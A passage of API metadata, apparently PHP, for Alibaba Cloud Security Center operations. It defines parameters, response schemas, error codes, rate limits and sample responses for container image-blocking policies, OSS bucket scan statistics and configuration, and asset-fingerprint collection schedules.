image names.', 'type' => 'array', 'items' => ['description' => 'The image name.', 'type' => 'string', 'example' => 'opa-test', 'title' => ''], 'title' => '', 'example' => '', ], 'Label' => [ 'description' => 'The image tags.', 'type' => 'array', 'items' => ['description' => 'The image tag.', 'type' => 'string', 'example' => 'app.kubernetes.io/instance:devops', 'title' => ''], 'title' => '', 'example' => '', ], 'RuleAction' => ['description' => 'The action that is performed when the rule is hit. Valid values:'."\n" ."\n" .'- **1**: trigger alerts'."\n" ."\n" .'- **2**: block'."\n" ."\n" .'- **3**: allow', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'WhiteList' => [ 'description' => 'The image tags that are added to the whitelist.', 'type' => 'array', 'items' => ['description' => 'The image tag that is added to the whitelist.', 'type' => 'string', 'example' => 'test-tag', 'title' => ''], 'title' => '', 'example' => '', ], 'AlarmDetail' => [ 'description' => 'The rule configuration.', 'type' => 'object', 'properties' => [ 'Baseline' => [ 'description' => 'The baseline check configuration.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'example' => 'low', 'title' => ''], 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The information about the baseline check item.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the baseline check item.', 'type' => 'string', 'example' => 'ak_leak', 'title' => ''], 'Name' => ['description' => 'The name of the baseline check item.', 'type' => 'string', 'example' => 'Access Key plaintext storage', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Vul' => [ 'description' => 'The vulnerability configuration.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'example' => 'medium', 'title' => ''], 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The information about the vulnerability.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the vulnerability.', 'type' => 'string', 'example' => 'AVD-2023-1680169', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'ezOffice evoInterfaceServlet Info Leak', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RiskClass' => [ 'description' => 'Risk type of vulnerability.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the vulnerability types. Valid values:'."\n" ."\n" .'- **cve**: system vulnerability'."\n" ."\n" .'- **app**: application vulnerability', 'type' => 'string', 'example' => 'cve', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability. Valid values:'."\n" ."\n" .'- **system vulnerability**'."\n" ."\n" .'- **application vulnerability**', 'type' => 'string', 'example' => '系统漏洞', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'MaliciousFile' => [ 'description' => 'The configuration of malicious samples.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'example' => 'high', 'title' => ''], 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The information about the malicious sample.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the malicious sample.', 'type' => 'string', 'example' => '1811', 'title' => ''], 'Name' => ['description' => 'The name of the malicious sample.', 'type' => 'string', 'example' => 'abnormal binary file'."\n", 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'SensitiveFile' => [ 'description' => 'The configuration of sensitive file.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'example' => 'low', 'title' => ''], 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The configuration of sensitive file.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the sensitive files.'."\n" ."\n" .'> You can call the [GetSensitiveDefineRuleConfig](~~GetSensitiveDefineRuleConfig~~) operation to query the ID of the malicious sample.', 'type' => 'string', 'example' => 'key', 'title' => ''], 'Name' => ['description' => 'The name of the sensitive files.'."\n" ."\n" .'> You can call the [GetSensitiveDefineRuleConfig](~~GetSensitiveDefineRuleConfig~~) operation to query the ID of the malicious sample.', 'type' => 'string', 'example' => 'name', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'BuildRisk' => [ 'description' => 'The configuration of image build risk.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**'."\n" ."\n" .'- **medium**'."\n" ."\n" .'- **low**', 'type' => 'string', 'example' => 'high', 'title' => ''], 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The configuration of image build risk.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the image build risk.'."\n" ."\n" .'> You can call the [ListImageBuildRiskItem](~~ListImageBuildRiskItem~~) operation to query the ID of the malicious sample.', 'type' => 'string', 'example' => 'key', 'title' => ''], 'Name' => ['description' => 'The name of the image build risk.'."\n" ."\n" .'> You can call the [ListImageBuildRiskItem](~~ListImageBuildRiskItem~~) operation to query the ID of the malicious sample.', 'type' => 'string', 'example' => 'name', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Scopes' => [ 'title' => '', 'description' => 'The application scope.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c1fdb5fd8d**7163', 'title' => ''], 'AllNamespace' => ['description' => 'Indicates whether all namespaces are included. Valid values:'."\n" ."\n" .'- **1**: yes'."\n" ."\n" .'- **0**: no', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NamespaceList' => [ 'description' => 'The namespaces.', 'type' => 'array', 'items' => ['description' => 'The namespace.', 'type' => 'string', 'example' => 'namespace1', 'title' => ''], 'title' => '', 'example' => '', ], 'AckPolicyInstanceId' => ['description' => 'The rule instance ID of the cluster.', 'type' => 'string', 'example' => 'ack-0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'example' => '', ], 'Lang' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'example' => 'zh', 'title' => ''], 'CurrentPage' => ['description' => 'The page number. Default value: **1**. Pages start from page 1.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'E819FD71-D240-5E54-AA7F-20FED2ECBEB6', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code that is returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"StrategyId\\": 1005,\\n \\"StrategyTemplateId\\": 1204,\\n \\"ClusterId\\": \\"c8ca91e0907d94efaba7fb0827eb9****\\",\\n \\"StrategyName\\": \\"test001\\",\\n \\"Description\\": \\"Custom defense configuration\\",\\n \\"ClusterName\\": \\"test\\",\\n \\"UnScanedImage\\": true,\\n \\"MaliciousImage\\": true,\\n \\"ImageName\\": [\\n \\"opa-test\\"\\n ],\\n \\"Label\\": [\\n \\"app.kubernetes.io/instance:devops\\"\\n ],\\n \\"RuleAction\\": 1,\\n \\"WhiteList\\": [\\n \\"test-tag\\"\\n ],\\n \\"AlarmDetail\\": {\\n \\"Baseline\\": {\\n \\"RiskLevel\\": [\\n \\"low\\"\\n ],\\n \\"Item\\": [\\n {\\n \\"Id\\": \\"ak_leak\\",\\n \\"Name\\": \\"Access Key plaintext storage\\"\\n }\\n ]\\n },\\n \\"Vul\\": {\\n \\"RiskLevel\\": [\\n \\"medium\\"\\n ],\\n \\"Item\\": [\\n {\\n \\"Id\\": \\"AVD-2023-1680169\\",\\n \\"Name\\": \\"ezOffice evoInterfaceServlet Info Leak\\"\\n }\\n ],\\n \\"RiskClass\\": [\\n {\\n \\"Id\\": \\"cve\\",\\n \\"Name\\": \\"系统漏洞\\"\\n }\\n ]\\n },\\n \\"MaliciousFile\\": {\\n \\"RiskLevel\\": [\\n \\"high\\"\\n ],\\n \\"Item\\": [\\n {\\n \\"Id\\": \\"1811\\",\\n \\"Name\\": \\"abnormal binary file\\\\n\\"\\n }\\n ]\\n },\\n \\"SensitiveFile\\": {\\n \\"RiskLevel\\": [\\n \\"low\\"\\n ],\\n \\"Item\\": [\\n {\\n \\"Id\\": \\"key\\",\\n \\"Name\\": \\"name\\"\\n }\\n ]\\n },\\n \\"BuildRisk\\": {\\n \\"RiskLevel\\": [\\n \\"high\\"\\n ],\\n \\"Item\\": [\\n {\\n \\"Id\\": \\"key\\",\\n \\"Name\\": \\"name\\"\\n }\\n ]\\n }\\n },\\n \\"Scopes\\": [\\n {\\n \\"ClusterId\\": \\"c1fdb5fd8d**7163\\",\\n \\"AllNamespace\\": 1,\\n \\"NamespaceList\\": [\\n \\"namespace1\\"\\n ],\\n \\"AckPolicyInstanceId\\": \\"ack-0\\"\\n }\\n ],\\n \\"Lang\\": \\"zh\\",\\n \\"CurrentPage\\": 4,\\n \\"PageSize\\": 20\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"success\\",\\n \\"RequestId\\": \\"E819FD71-D240-5E54-AA7F-20FED2ECBEB6\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'GetOpaStrategyDetailNew', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaStrategyDetailNew'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetOpaStrategyDetailNew', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetOpaStrategyTemplateSummary' => [ 'summary' => 'Queries the usage statistics information of risky image blocking policy templates for container proactive defense.', 'methods' => ['get', 'post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The list of usage statistics for risky image blocking rule templates.', 'type' => 'array', 'items' => [ 'description' => 'The usage statistics for a risky image blocking rule template.', 'type' => 'object', 'properties' => [ 'TemplateId' => ['description' => 'The template ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'TemplateName' => ['description' => 'The template name.', 'type' => 'string', 'example' => 'Blank template', 'title' => ''], 'Count' => ['description' => 'The total number of rules that use the template.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Description' => ['title' => '', 'description' => 'The template description.', 'type' => 'string', 'example' => 'Custom defense configuration'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '54572138-3390-5774-B71D-799DC8C2161B', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query usage statistics of risky image blocking policy templates', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaStrategyTemplateSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetOpaStrategyTemplateSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"TemplateId\\": 1,\\n \\"TemplateName\\": \\"Blank template\\",\\n \\"Count\\": 2,\\n \\"Description\\": \\"Custom defense configuration\\"\\n }\\n ],\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"54572138-3390-5774-B71D-799DC8C2161B\\"\\n}","type":"json"}]', ], 'GetOssBucketScanStatistic' => [ 'summary' => 'Retrieves OSS scan statistics.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '172778', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [ [ 'name' => 'BucketNameList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of bucket names.', 'type' => 'array', 'items' => ['description' => 'The bucket name.', 'type' => 'string', 'required' => false, 'example' => 'hz-new02****', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. Valid values:'."\n" .'- **API**: API-based scan.'."\n" .'- **OSS**: OSS-based scan.', 'type' => 'string', 'required' => false, 'example' => 'API', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The China Chinese system generates a unique identifier for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'FAC50208-E56B-5CC8-8738-2B219D1A****', 'title' => ''], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'RiskBucket' => ['description' => 'The number of buckets that contain risky files.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'HighRisk' => ['description' => 'The number of high-risk files.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'MediumRisk' => ['description' => 'The number of medium-risk files.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'LowRisk' => ['description' => 'The number of low-risk files.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'NoScanBucket' => ['description' => 'The number of buckets that have not been scanned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TotalBucket' => ['description' => 'The total number of buckets.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ScanObject' => ['description' => 'The number of scanned files.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'RemainAuth' => ['description' => 'The remaining number of authorizations.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ExpireTime' => ['description' => 'The timestamp when the authorization expires.', 'type' => 'integer', 'format' => 'int64', 'example' => '1714442403000', 'title' => ''], 'TotalObject' => ['description' => 'The total number of files in the buckets.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'PrePayAuthCount' => ['description' => 'The number of prepaid authorization times.', 'type' => 'integer', 'format' => 'int64', 'example' => '10000', 'title' => ''], 'PrePayInvokeCount' => ['description' => 'The number of prepaid invocations used.', 'type' => 'integer', 'format' => 'int64', 'example' => '100', 'title' => ''], 'PostPayInvokeCount' => ['description' => 'The number of pay-as-you-go invocations used.', 'type' => 'integer', 'format' => 'int64', 'example' => '1000', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve OSS scan statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOssBucketScanStatistic'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetOssBucketScanStatistic', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FAC50208-E56B-5CC8-8738-2B219D1A****\\",\\n \\"Data\\": {\\n \\"RiskBucket\\": 1,\\n \\"HighRisk\\": 0,\\n \\"MediumRisk\\": 0,\\n \\"LowRisk\\": 0,\\n \\"NoScanBucket\\": 1,\\n \\"TotalBucket\\": 1,\\n \\"ScanObject\\": 1,\\n \\"RemainAuth\\": 1,\\n \\"ExpireTime\\": 1714442403000,\\n \\"TotalObject\\": 1,\\n \\"PrePayAuthCount\\": 10000,\\n \\"PrePayInvokeCount\\": 100,\\n \\"PostPayInvokeCount\\": 1000\\n }\\n}","type":"json"}]', ], 'GetOssScanConfig' => [ 'summary' => 'Retrieves the scan policy configuration.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '172831', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [ [ 'name' => 'BucketName', 'in' => 'query', 'schema' => ['description' => 'The bucket name.', 'type' => 'string', 'required' => false, 'example' => 'iboxpublic****', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The policy ID.', 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'E10BAF1C-A6C5-51E2-866C-76D5922E****', 'title' => ''], 'Data' => [ 'description' => 'The data details.', 'type' => 'object', 'properties' => [ 'Enable' => ['description' => 'Indicates whether the policy is enabled. Valid values:'."\n" .'- **1**: enabled'."\n" .'- **0**: disabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ScanDayList' => [ 'description' => 'The scan days. Each number represents a day of the week.', 'type' => 'array', 'items' => ['description' => 'The scan days. Each number represents a day of the week.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'title' => '', 'example' => '', ], 'BucketNameList' => [ 'description' => 'The list of bucket names.', 'type' => 'array', 'items' => ['description' => 'The bucket name.', 'type' => 'string', 'example' => 'bcdata-oss****', 'title' => ''], 'title' => '', 'example' => '', ], 'KeySuffixList' => [ 'description' => 'The list of file suffixes to scan.', 'type' => 'array', 'items' => ['description' => 'The file suffix to scan.', 'type' => 'string', 'example' => '.asp', 'title' => ''], 'title' => '', 'example' => '', ], 'StartTime' => ['description' => 'The scan start time in the HH:mm:ss format.', 'type' => 'string', 'example' => '00:00:00', 'title' => ''], 'EndTime' => ['description' => 'The scan end time in the HH:mm:ss format.', 'type' => 'string', 'example' => '00:00:00'."\n", 'title' => ''], 'Name' => ['description' => 'The policy name.', 'type' => 'string', 'example' => 'testPolicy****', 'title' => ''], 'KeyPrefixList' => [ 'description' => 'The file prefix list.', 'type' => 'array', 'items' => ['description' => 'The file prefix.', 'type' => 'string', 'example' => '/root', 'title' => ''], 'title' => '', 'example' => '', ], 'Id' => ['description' => 'The policy ID.', 'type' => 'string', 'example' => '1', 'title' => ''], 'BucketName' => ['description' => 'The bucket name.', 'type' => 'string', 'example' => 'hz-new02****', 'title' => ''], 'LastUpdateTime' => ['description' => 'The timestamp of the last update.', 'type' => 'integer', 'format' => 'int64', 'example' => '1702025633079', 'title' => ''], 'BucketCount' => ['description' => 'The number of buckets.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AllKeyPrefix' => ['description' => 'Indicates whether all prefixes are matched.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'DecompressMaxLayer' => ['description' => 'The maximum number of decompression layers for nested compressed files. Minimum value: 1. Maximum value: 5. If the number of layers exceeds this value, the decompression operation stops. Files that have already been decompressed are still scanned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'DecompressMaxFileCount' => ['description' => 'The maximum number of files to decompress. Minimum value: 1. Maximum value: 1000. If the number of files exceeds this value, the decompression operation stops. Files that have already been decompressed are still scanned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'DecryptionList' => [ 'description' => 'The list of decryption types.', 'type' => 'array', 'items' => ['description' => 'The decryption type. Valid values:'."\n" ."\n" .'- **OSS**: OSS-managed encryption.'."\n" .'- **KMS**: Key Management Service (KMS).', 'type' => 'string', 'example' => 'KMS', 'title' => ''], 'title' => '', 'example' => '', ], 'LastModifiedStartTime' => ['description' => 'Scans files whose last modification time is after the specified timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1724301769834', 'title' => ''], 'RealTimeIncr' => ['description' => 'Specifies whether to enable real-time incremental scanning. If this parameter is set to true, the ScanDayList, StartTime, and EndTime parameters do not take effect.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve scan policy configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOssScanConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetOssScanConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'OssScanConfig', 'arn' => 'acs:yundun-sas:*:{#accountId}:ossscanconfig/{#ConfigId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"E10BAF1C-A6C5-51E2-866C-76D5922E****\\",\\n \\"Data\\": {\\n \\"Enable\\": 1,\\n \\"ScanDayList\\": [\\n 1\\n ],\\n \\"BucketNameList\\": [\\n \\"bcdata-oss****\\"\\n ],\\n \\"KeySuffixList\\": [\\n \\".asp\\"\\n ],\\n \\"StartTime\\": \\"00:00:00\\",\\n \\"EndTime\\": \\"00:00:00\\\\n\\",\\n \\"Name\\": \\"testPolicy****\\",\\n \\"KeyPrefixList\\": [\\n \\"/root\\"\\n ],\\n \\"Id\\": \\"1\\",\\n \\"BucketName\\": \\"hz-new02****\\",\\n \\"LastUpdateTime\\": 1702025633079,\\n \\"BucketCount\\": 1,\\n \\"AllKeyPrefix\\": true,\\n \\"DecompressMaxLayer\\": 1,\\n \\"DecompressMaxFileCount\\": 100,\\n \\"DecryptionList\\": [\\n \\"KMS\\"\\n ],\\n \\"LastModifiedStartTime\\": 1724301769834,\\n \\"RealTimeIncr\\": true\\n }\\n}","type":"json"}]', ], 'GetPropertyScheduleConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of Asset Fingerprints for which the automatic collection frequency is configured. Valid values:'."\n" ."\n" .'- **scheduler\\_port_period**: listening port'."\n" .'- **scheduler\\_process_period**: running process'."\n" .'- **scheduler\\_account_period**: account asset'."\n" .'- **scheduler\\_software_period**: software asset'."\n" .'- **scheduler\\_cron_period**: scheduled node'."\n" .'- **scheduler\\_sca_period**: middleware'."\n" .'- **scheduler\\_autorun_period**: startup item'."\n" .'- **scheduler\\_lkm_period**: kernel module'."\n" .'- **scheduler\\_sca\\_proxy_period**: website', 'type' => 'string', 'required' => false, 'example' => 'scheduler_sca_period', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query.'."\n" .'>You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '50d213b4-3a35-427a-b8a5-04b0c7e1****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'B37C9052-A73E-4707-A024-92477028****', 'title' => ''], 'PropertyScheduleConfig' => [ 'description' => 'The collection cycle configuration of Asset Fingerprints.', 'type' => 'object', 'properties' => [ 'ScheduleTime' => ['description' => 'The collection frequency of Asset Fingerprints. Valid values:'."\n" ."\n" .'- **0**: Disabled. Periodic automatic collection of Asset Fingerprints is not performed.'."\n" .'- **1**: Collected once every hour.'."\n" .'- **3**: Collected once every 3 hours.'."\n" .'- **12**: Collected once every 12 hours.'."\n" .'- **24**: Collected once every day.'."\n" .'- **168**: Collected once every 7 days.', 'type' => 'string', 'example' => '3', 'title' => ''], 'Type' => ['description' => 'The type of Asset Fingerprints for which the automatic collection frequency is configured. Valid values:'."\n" ."\n" .'- **scheduler\\_port_period**: listening port'."\n" .'- **scheduler\\_process_period**: running process'."\n" .'- **scheduler\\_account_period**: account asset'."\n" .'- **scheduler\\_software_period**: software asset'."\n" .'- **scheduler\\_cron_period**: scheduled node'."\n" .'- **scheduler\\_sca_period**: middleware'."\n" .'- **scheduler\\_autorun_period**: startup item'."\n" .'- **scheduler\\_lkm_period**: kernel module'."\n" .'- **scheduler\\_sca\\_proxy_period**: website', 'type' => 'string', 'example' => 'scheduler_account_period', 'title' => ''], 'NextScheduleTime' => ['description' => 'The estimated timestamp when the next Asset Fingerprints collection starts. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671630647018', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query asset fingerprints collection cycle configuration', 'summary' => 'Queries the collection cycle configuration of Asset Fingerprints.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetPropertyScheduleConfig'], ], 'product' => ['code' => 'sas', 'title' => 